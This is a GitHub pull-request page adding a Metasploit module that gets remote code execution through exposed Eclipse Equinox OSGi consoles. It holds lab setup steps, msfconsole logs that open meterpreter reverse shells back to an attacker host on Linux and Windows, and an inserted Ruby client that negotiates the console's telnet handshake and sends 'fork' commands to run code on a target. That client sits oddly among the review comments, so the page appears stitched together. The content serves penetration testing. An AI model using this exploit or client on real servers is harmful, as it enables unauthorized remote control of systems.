
Add module for Eclipse Equinoxe OSGi console RCE. #9554

Merged
merged 7 commits into from Mar 7, 2018

Conversation

@QKaiser
Contributor

commented Feb 13, 2018

Vulnerable Application

Description

This module takes advantage of OSGi consoles exposed by some Java-based middleware servers.

The OSGi console is a telnet-based server that can be used for remote debugging and dynamic loading/removal of Java bundles running on an OSGi-based server.

References

Test setup

Linux environment

Follow these steps to run the vulnerable application on a Linux host:

  1. Create a test environment directory
    mkdir testenv && cd testenv
  2. Download the setup script
    wget https://gist.githubusercontent.com/QKaiser/66c8a618eef2a7801c0bbb1aa43d724a/raw/e098f6ea31717311bd6ce5b3be94744dddfc2388/setup.sh
  3. Set appropriate permission
    chmod +x setup.sh
  4. Execute setup script
    ./setup.sh
  5. Launch the vulnerable application with this command so it listens on port TCP/5555
    java -jar org.eclipse.osgi.jar -console 5555
  6. Verify that the server is running, you should be prompted with osgi>
    telnet localhost 5555
  7. From the telnet console, enable the second server. This one listens on port 2019 by default. Set the IP to an address linked to an external interface if the attacker machine is on another host.
    telnetd --ip=127.0.0.1 start

Windows environment

Follow these steps to run the vulnerable application on a Windows host:

  1. Download the Eclipse Equinox SDK from https://www.eclipse.org/downloads/download.php?file=/equinox/drops/R-Oxygen.2-201711300510/equinox-SDK-Oxygen.2.zip&r=1
  2. Create a test directory. Let's name it osgi_test for clarity.
  3. Create a directory named configuration in osgi_test
  4. Create a file named config.ini in your configuration directory. The file should contain the following lines only:
osgi.bundles=org.eclipse.equinox.console@start, org.apache.felix.gogo.command@start, org.apache.felix.gogo.shell@start, org.apache.felix.gogo.runtime@start
eclipse.ignoreApp=true
osgi.noShutdown=true
  5. Create an empty plugins directory in the osgi_test directory
  6. Extract plugins/org.apache.felix.gogo.command_(version).jar from the SDK as org.apache.felix.gogo.command.jar in the osgi_test directory.
  7. Extract plugins/org.apache.felix.gogo.runtime_(version).jar from the SDK as org.apache.felix.gogo.runtime.jar in the osgi_test directory.
  8. Extract plugins/org.apache.felix.gogo.shell_(version).jar from the SDK as org.apache.felix.gogo.shell.jar in the osgi_test directory.
  9. Extract plugins/org.eclipse.equinox.console_(version).jar from the SDK as org.eclipse.equinox.console.jar in the osgi_test directory.
  10. Extract plugins/org.eclipse.osgi_(version).jar from the SDK as org.eclipse.osgi.jar in the osgi_test directory.
  11. At the end of those steps, your osgi_test directory should contain the following items:
.
├── configuration
│   └── config.ini
├── org.apache.felix.gogo.command.jar
├── org.apache.felix.gogo.runtime.jar
├── org.apache.felix.gogo.shell.jar
├── org.eclipse.equinox.console.jar
├── org.eclipse.osgi.jar
└── plugins
  12. Launch the vulnerable application with this command so it listens on port TCP/5555
    java -jar org.eclipse.osgi.jar -console 5555
  13. Verify that the server is running; you should be prompted with osgi>
    telnet localhost 5555
  14. From the telnet console, enable the second server. This one listens on port 2019 by default. Set the IP to an address linked to an external interface if the attacker machine is on another host.
    telnetd --ip=127.0.0.1 start

If you don't want to go through all those steps manually, I recommend running the setup script on a Linux host, mounting the directory on a Windows VM and starting from step 11.

Verification Steps

You can verify the module against the vulnerable application with those steps:

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/misc/osgi_console_exec
  4. Do: set RHOST 127.0.0.1
  5. Do: set RPORT 5555 or set RPORT 2019
  6. Do: check. The target should appear vulnerable.
  7. Do: set payload with the payload of your choosing.
  8. Do: run
  9. You should get a shell.

Options

TIME_WAIT - Time to wait for the payload to be executed. The default value is set to 20 seconds.

Scenarios

Reverse shell on Linux host

Exploit running against an Ubuntu Linux target:

msf5 > use exploit/multi/misc/osgi_console_exec 
msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.4
msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555
msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 0
msf5 exploit(multi/misc/osgi_console_exec) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2
msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444
msf5 exploit(multi/misc/osgi_console_exec) > run
[*] Exploit running as background job 1.
[*] Started reverse TCP handler on 172.20.10.2:4444 
[*] 172.20.10.4:5555 - Accessing the OSGi console ...
[*] 172.20.10.4:5555 - Exploiting...
[*] Sending stage (857352 bytes) to 172.20.10.4
[*] 172.20.10.4:5555 - 172.20.10.4:5555 - Waiting for session...
[*] Meterpreter session 2 opened (172.20.10.2:4444 -> 172.20.10.4:39314) at 2018-02-14 19:17:39 +0100
[*] 172.20.10.4:5555 - Command Stager progress - 100.00% done (763/763 bytes)

msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer     : 172.20.10.4
OS           : Ubuntu 16.04 (Linux 4.4.0-38-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Reverse shell on Windows host

Exploit running against a Windows 7 target:

msf5 > use exploit/multi/misc/osgi_console_exec 
msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.3
msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555
msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 1
msf5 exploit(multi/misc/osgi_console_exec) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2
msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444
msf5 exploit(multi/misc/osgi_console_exec) > run
[*] Exploit running as background job 2.
[*] Started reverse TCP handler on 172.20.10.2:4444 
[*] 172.20.10.3:5555 - Accessing the OSGi console ...
[*] 172.20.10.3:5555 - Exploiting...
[*] 172.20.10.3:5555 - 172.20.10.3:5555 - Waiting for session...
[*] Sending stage (179779 bytes) to 172.20.10.3
[*] Meterpreter session 1 opened (172.20.10.2:4444 -> 172.20.10.3:49365) at 2018-02-14 19:14:15 +0100
msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : PENTEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

If you happen to know a good bypass to feed command stager to getRuntime().exec() without relying on the presence of bash let me know :)

@QKaiser QKaiser changed the title Eclipse Equinoxe OSGi console remote command execution. Add module for Eclipse Equinoxe OSGi console RCE. Feb 13, 2018

@QKaiser

Contributor Author

commented Feb 14, 2018

Edited documentation by following the template. Let me know if something is missing or unclear.

@sempervictus
Contributor

left a comment

Thank you for the PR. Any chance the hex strings could be expanded or commented up a bit? It's rather opaque ATM.

@sempervictus

Contributor

commented on e86169c Feb 16, 2018

Thank you very much.
Is there a protocol library that can generate these bytes in any language (just to reference structures and such)?

@h00die

Contributor

commented Feb 16, 2018

Did you forget to add the docs to this PR? I still only see one file.

@QKaiser

Contributor Author

commented Feb 17, 2018

Fixed missing documentation file.

Follow these steps to run the vulnerable application on a Linux host:

1. Create a test environment directory
``mkdir testenv && cd testenv``

@h00die

h00die Feb 17, 2018

Contributor

single ticks here

1. Create a test environment directory
``mkdir testenv && cd testenv``
2. Download the setup script
``wget https://gist.githubusercontent.com/QKaiser/66c8a618eef2a7801c0bbb1aa43d724a/raw/e098f6ea31717311bd6ce5b3be94744dddfc2388/setup.sh``

@h00die

h00die Feb 17, 2018

Contributor

single ticks here

3. Set appropriate permission
`chmod +x setup.sh`
4. Execute setup script
``./setup.sh``

@h00die

h00die Feb 17, 2018

Contributor

single ticks here

4. Execute setup script
``./setup.sh``
5. Launch the vulnerable application with this command so it listens on port TCP/5555
``java -jar org.eclipse.osgi.jar -console 5555``

@h00die

h00die Feb 17, 2018

Contributor

single ticks here

5. Launch the vulnerable application with this command so it listens on port TCP/5555
``java -jar org.eclipse.osgi.jar -console 5555``
6. Verify that the server is running, you should be prompted with `osgi> `
``telnet localhost 5555``

@h00die

h00die Feb 17, 2018

Contributor

single or triple ticks here


Exploit running against a Ubuntu Linux target:

``

@h00die

h00die Feb 17, 2018

Contributor

triple ticks

BuildTuple : i486-linux-musl
Meterpreter : x86/linux
``

@h00die

h00die Feb 17, 2018

Contributor

triple ticks

Exploit running against a Windows 7 target:
``

@h00die

h00die Feb 17, 2018

Contributor

triple ticks

Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
``

@h00die

h00die Feb 17, 2018

Contributor

triple ticks

``
## References

@h00die

h00die Feb 17, 2018

Contributor

I would actually remove this section and move it up to the description area.

@h00die

Contributor

commented Feb 17, 2018

docs look really good overall, a bunch of nit picks. well done!

@QKaiser

Contributor Author

commented Feb 17, 2018

@sempervictus regarding protocol library, Msf::Exploit::Remote::Telnet is not modular enough for this specific use case. It works when connecting to the OSGi console if it runs in "telnetd mode" but not in "direct mode", where this weird IAC terminal type exchange happens.

What I could do though is use IAC constants from Msf::Exploit::Remote::Telnet such as OPT_TTYPE in the module code so it's more readable than a bunch of hex bytes.
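The direct-mode exchange described in the comment above (the terminal-type negotiation the console insists on before it prints its prompt) and the `fork`-based command execution from the PR description and release notes, as an added example that is not part of this PR or the Metasploit module. It is a standalone Ruby client plus a constructed fake console so it runs offline: the `xterm` terminal type, the `FakeOsgiConsole` class and its canned `uid=1000(app) ...` reply are assumptions, and `fork <command>` follows the release-note description of the module on this page.

```ruby
# Telnet protocol bytes (RFC 854) and the TERMINAL-TYPE option (RFC 1091).
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
OPT_TTYPE, TTYPE_IS, TTYPE_SEND = 24, 0, 1
OSGI_PROMPT = 'osgi> '.b

# Client for an Equinox console reached directly (java ... -console <port>). The console
# negotiates the terminal type before printing its prompt, so the client must answer
# IAC DO TTYPE and the SB TTYPE SEND request or it never sees "osgi> ".
class OsgiConsoleClient
  # io: anything with readpartial/write (a TCPSocket, or the constructed fake below).
  def initialize(io, term: 'xterm')   # the terminal type is an assumption; any value works
    @io, @term, @pending = io, term.b, ''.b   # @pending: unfinished IAC sequence between reads
  end

  # Read until the prompt, answering negotiation on the way; returns the IAC-free bytes.
  # readpartial raises EOFError if the server hangs up; wrap in Timeout.timeout for real hosts.
  def connect
    buf = ''.b
    buf << filter_telnet(@io.readpartial(4096)) until buf.end_with?(OSGI_PROMPT)
    buf
  end

  # Send one console command and return its output minus echo and prompt.
  # "fork <command>" is the console command the module on this page uses to spawn a process.
  def run_command(cmd)
    @io.write(cmd + "\n")
    out = connect.sub(/\A#{Regexp.escape(cmd)}\r?\n/, '')
    out.delete_suffix(OSGI_PROMPT).sub(/\r?\n\z/, '')
  end

  # The module's check, in spirit: an unauthenticated prompt is the vulnerability.
  def self.prompt?(banner)
    banner.b.include?(OSGI_PROMPT)
  end

  private

  # Strip telnet commands from a chunk, replying where needed; data bytes pass through.
  def filter_telnet(chunk)
    data = ''.b
    @pending << chunk.b
    until @pending.empty?
      i = @pending.index(IAC.chr)
      if i.nil?
        data << @pending
        @pending = ''.b
        break
      end
      data << @pending.byteslice(0, i)
      @pending = @pending.byteslice(i..-1)
      consumed = handle_iac(@pending)
      break if consumed.nil?                          # incomplete, wait for more bytes
      data << IAC.chr if @pending.getbyte(1) == IAC   # IAC IAC is an escaped 0xFF data byte
      @pending = @pending.byteslice(consumed..-1)
    end
    data
  end

  # Bytes of seq (which starts with IAC) consumed, or nil if the sequence is incomplete.
  def handle_iac(seq)
    return nil if seq.bytesize < 2
    cmd = seq.getbyte(1)
    case cmd
    when DO, DONT, WILL, WONT
      return nil if seq.bytesize < 3
      opt = seq.getbyte(2)
      # Agree only to TERMINAL-TYPE; refuse every other request in either direction.
      @io.write([IAC, opt == OPT_TTYPE ? WILL : WONT, opt].pack('C*')) if cmd == DO
      @io.write([IAC, DONT, opt].pack('C*')) if cmd == WILL
      3
    when SB                                           # IAC SB <opt> ... IAC SE
      stop = seq.index([IAC, SE].pack('C*'), 2)
      return nil if stop.nil?
      sub = seq.byteslice(2...stop)
      if sub.getbyte(0) == OPT_TTYPE && sub.getbyte(1) == TTYPE_SEND
        @io.write([IAC, SB, OPT_TTYPE, TTYPE_IS].pack('C*') + @term + [IAC, SE].pack('C*'))
      end
      stop + 2
    else
      2                                               # IAC IAC, NOP, GA and friends
    end
  end
end

# Constructed stand-in for a direct-mode console (not the real Equinox server): it demands
# the terminal type before printing the prompt, echoes each command line and answers
# "fork id" with canned output.
class FakeOsgiConsole
  attr_reader :sent

  def initialize
    @sent = ''.b
    @outbox = [[IAC, DO, OPT_TTYPE].pack('C*'),
               [IAC, SB, OPT_TTYPE, TTYPE_SEND, IAC, SE].pack('C*') + "\r\n".b, OSGI_PROMPT]
  end

  def readpartial(_max)
    raise EOFError, 'console closed' if @outbox.empty?
    @outbox.shift
  end

  def write(bytes)
    @sent << bytes.b
    line = bytes.b.chomp
    @outbox << (line + "\r\nuid=1000(app) gid=1000(app)\r\n" + OSGI_PROMPT) if line.start_with?('fork ')
    bytes.bytesize
  end
end
```

Against a live console, pass a `TCPSocket.new(host, port)` (after `require 'socket'`) as `io` and wrap `connect` in `Timeout.timeout`. Because the client only replies when the server asks, the same code also works against the `telnetd`-mode listener on port 2019, which the comment above says the stock Telnet mixin already handles. Sending `ss` (bundle short status) is a quieter way to confirm access than `fork` when you do not want to spawn a process on the target.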

@QKaiser

Contributor Author

commented Feb 17, 2018

@sempervictus I took a shot at using Msf::Exploit::Remote::Telnet constants. Let me know what you think.

@jrobles-r7 jrobles-r7 added docs and removed needs-docs labels Mar 7, 2018

@jrobles-r7 jrobles-r7 self-assigned this Mar 7, 2018

@jrobles-r7

Contributor

commented Mar 7, 2018

OSGI Console on Debian 9.3 x64

msf5 > use exploit/multi/misc/osgi_console_exec
msf5 exploit(multi/misc/osgi_console_exec) > set rhost 172.22.222.135
rhost => 172.22.222.135
msf5 exploit(multi/misc/osgi_console_exec) > set rport 5555
rport => 5555
msf5 exploit(multi/misc/osgi_console_exec) > check
[+] 172.22.222.135:5555 The target is vulnerable.
msf5 exploit(multi/misc/osgi_console_exec) > run
[*] Exploit running as background job 0.
msf5 exploit(multi/misc/osgi_console_exec) > 
[*] Started reverse TCP handler on 172.22.222.131:4444 
[*] 172.22.222.135:5555 - Accessing the OSGi console ...
[*] 172.22.222.135:5555 - Exploiting...
[*] Sending stage (857352 bytes) to 172.22.222.135
[*] 172.22.222.135:5555 - Command Stager progress - 100.00% done (763/763 bytes)

msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : test-deb.test-dom
OS           : Debian 9.3 (Linux 4.9.0-6-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

OSGI Console on Windows 7 SP1 x64

msf5 > use exploit/multi/misc/osgi_console_exec
msf5 exploit(multi/misc/osgi_console_exec) > set rhost 172.22.222.122
rhost => 172.22.222.122
msf5 exploit(multi/misc/osgi_console_exec) > set rport 5555
rport => 5555
msf5 exploit(multi/misc/osgi_console_exec) > set target 1 
target => 1
msf5 exploit(multi/misc/osgi_console_exec) > check
[+] 172.22.222.122:5555 The target is vulnerable.
msf5 exploit(multi/misc/osgi_console_exec) > run
[*] Exploit running as background job 0.
msf5 exploit(multi/misc/osgi_console_exec) > 
[*] Started reverse TCP handler on 172.22.222.131:4444 
[*] 172.22.222.122:5555 - Accessing the OSGi console ...
[*] 172.22.222.122:5555 - Exploiting...
[*] 172.22.222.122:5555 - 172.22.222.122:5555 - Waiting for session...
[*] Sending stage (179779 bytes) to 172.22.222.122

msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-V438RLMESAE\pwnduser
meterpreter > sysinfo
Computer        : WIN-V438RLMESAE
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

@jrobles-r7 jrobles-r7 merged commit 9e3f126 into rapid7:master Mar 7, 2018


jrobles-r7 added a commit that referenced this pull request Mar 7, 2018

@jrobles-r7

Contributor

commented Mar 7, 2018

Release Notes

The exploit/multi/misc/osgi_console_exec module has been added to the framework. It uses the fork command of exposed OSGi consoles to execute code on vulnerable servers.

msjenkins-r7 added a commit that referenced this pull request Mar 7, 2018

@tdoan-r7 tdoan-r7 added the rn-exploit label Mar 14, 2018
